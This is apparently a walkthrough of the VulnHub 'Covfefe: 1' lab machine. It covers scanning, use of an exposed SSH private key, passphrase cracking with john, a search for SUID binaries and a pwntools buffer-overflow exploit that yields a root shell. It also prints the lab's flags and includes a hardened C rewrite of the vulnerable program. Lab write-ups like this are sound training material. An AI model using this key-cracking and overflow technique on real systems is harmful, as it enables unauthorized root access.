Covfefe: 1 VulnHub Walkthrough
nmap -Pn -sS -sV -p- 192.168.0.35
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp    open  http    nginx 1.10.3
31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)
We can see that ssh is running, and that http is served on ports 80 and 31337.
nikto -h 192.168.0.35
Nothing of note came up....
gobuster dir -u http://192.168.0.35 -w /usr/share/dirb/wordlists/big.txt -t 50 -q
Again, nothing of note....
nikto -h http://192.168.0.35:31337
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 1499600596.267103, size: 70, mtime: 1587808388
+ Entry '/.bashrc' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/.profile' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/taxes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/id_rsa: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/id_rsa.pub: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ 7935 requests: 12 error(s) and 15 item(s) reported on remote h
It looks like we could connect over ssh using the private key id_rsa in the .ssh directory that robots.txt points to.
Let's check them one at a time.
/taxes
Good job! Here is a flag: flag1{make_america_great_again}
That's the first flag.
/.ssh
['id_rsa', 'authorized_keys', 'id_rsa.pub']
/.ssh/id_rsa
chmod 600 id_rsa
We set permission 600 on id_rsa so that ssh will accept it as an identity file.
ssh -i id_rsa simon@192.168.0.35
Enter passphrase for key 'id_rsa':
simon@192.168.0.35: Permission denied (publickey).
A passphrase is required, so we crack it with ssh2john.
python3 /usr/share/john/ssh2john.py id_rsa > hash.txt
john hash.txt
starwars (id_rsa)
ssh -i id_rsa simon@192.168.0.35
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$
We look for files with the SUID bit set, which execute with the privileges of their owner.
$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message
/bin/umount
/bin/su
/bin/mount
/bin/ping
However you look at it, /usr/local/bin/read_message is the suspicious one. There is no strings command on the box, so we start a simple HTTP server with python3 to download the binary to the local machine.
simon@covfefe:/tmp$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.0.26 - - [08/Jun/2020 01:47:19] "GET /read_message HTTP/1.1" 200 -
Running it locally under ltrace shows that entering Simon makes the comparison succeed and takes the true branch.
ltrace ./read_message
__libc_start_main(0x5656a690, 1, 0xffddab84, 0x5656a760 <unfinished ...>
puts("What is your name?"What is your name?
) = 19
gets(0xffddaab8, 0x695383fc, 0x6e6f6d, 1Simon
) = 0xffddaab8
strncmp("Simon", "Simon", 5) = 0
printf("Hello %s! Here is your message:\n"..., "Simon"Hello Simon! Here is your message:
) = 36
execve(0xffddaacc, 0, 0, 0x695383fc) = 0xffffffff
+++ exited (status 0) +++
simon@covfefe:/tmp$ /usr/local/bin/read_message
What is your name?
Simon
Hello Simon! Here is your message:

Hi Simon, I hope you like our private messaging system. I'm really happy with how it worked out! If you're interested in how it works, I've left a copy of the source code in my home directory.

- Charlie Root
The source code appears to be in /root, so let's look there. The second flag turns out to be in it.
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* added here: declares strncmp, which the file uses */
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[])
{
    char program[] = "/usr/local/sbin/message";
    char buf[20];
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);   /* unbounded read: input longer than 20 bytes runs past buf */

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }
}
simon@covfefe:/root$
We can see that when buf is Simon, program is executed. If we could overwrite it with /bin/sh, we would get a shell with root privileges.
Trying a few things locally, we find that there is a buffer overflow (BOF).
root@kali:~/vulnhub/covfefe_1# ./read_message
What is your name?
Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Hello Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! Here is your message:

Segmentation fault
buf is 20 bytes, and on the stack the program variable sits just past it, so we can expect that 20 bytes of padding reach the end of buf and the bytes that follow overwrite program.
I wrote the exploit code below; it spawned a shell locally, so I copied the payload and tried it on the remote host, where it also gave me a root shell.
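As an added example (not code from the walkthrough or from the VM's read_message.c), here is a hardened rewrite that closes both problems the source shows: the strncmp check that accepts any name starting with "Simon", and the gets() read that lets input spill from buf into the program variable on the stack. The program path and the authorized name are the ones on the page; NAME_MAX, validate_name, is_authorized and the classify test hook are names I chose for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NAME_MAX 20   /* same size as the original buf[20] */

/* Path and name live in read-only data, not on the stack beside the input
 * buffer, so an overflow of `name` can no longer change what execve() runs. */
static const char *const program = "/usr/local/sbin/message";
static const char *const authorized = "Simon";

/* Full-length comparison. The original strncmp(..., 5) accepted any
 * name that merely started with "Simon". */
int is_authorized(const char *name) {
    return strcmp(name, authorized) == 0;
}

/* Post-process a line read with fgets(): a missing newline means the
 * input was longer than the buffer, which is exactly the input that
 * overflowed buf in the original. Returns 0 (newline stripped) on
 * success, -1 if the line was truncated. */
int validate_name(char *name) {
    char *nl = strchr(name, '\n');
    if (nl == NULL) return -1;
    *nl = '\0';
    return 0;
}

/* Hypothetical test hook: push a constructed input line through the same
 * truncation fgets() applies (at most NAME_MAX-1 bytes, stop after '\n'),
 * then classify it. Returns 1 = accepted, 0 = wrong name, -1 = too long. */
int classify(const char *line) {
    char name[NAME_MAX];
    size_t n = 0;
    while (n < NAME_MAX - 1 && line[n] != '\0') {
        name[n] = line[n];
        n++;
        if (line[n - 1] == '\n') break;
    }
    name[n] = '\0';
    if (validate_name(name) != 0) return -1;
    return is_authorized(name) ? 1 : 0;
}

int main(void) {
    char name[NAME_MAX];
    printf("What is your name?\n");
    /* Bounded read instead of gets(); reject anything that did not fit. */
    if (fgets(name, sizeof name, stdin) == NULL || validate_name(name) != 0) {
        fprintf(stderr, "Name missing or too long.\n");
        return EXIT_FAILURE;
    }
    if (!is_authorized(name)) {
        printf("Sorry %s, you're not %s!\n", name, authorized);
        return EXIT_FAILURE;
    }
    printf("Hello %s! Here is your message:\n\n", name);
    char *const argv[] = { (char *)program, NULL };
    char *const envp[] = { NULL };   /* explicit, empty environment for the child */
    execve(program, argv, envp);
    perror("execve");                /* only reached if the exec failed */
    return EXIT_FAILURE;
}
```

The interesting case for a reviewer is the page's own payload, "SimonAAAAAAAAAAAAAAA/bin/sh": fgets stops after 19 bytes, the newline never arrives, and validate_name rejects the line before any comparison or exec happens. A name such as "Simonaaaa", which the original's five-character prefix check let through, is now refused by the full strcmp.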
from pwn import *

e = ELF('./read_message')
p = process('./read_message')

# "Simon" satisfies the 5-byte strncmp, the padding fills the rest of the
# 20-byte buf, and the bytes that follow land in the program variable
payload = 'Simon'
payload += 'A'*(20-len(payload))
payload += '/bin/sh'
print "payload: " + payload

p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()
simon@covfefe:/root$ /usr/local/bin/read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:

# whoami
root
# cat /root/flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}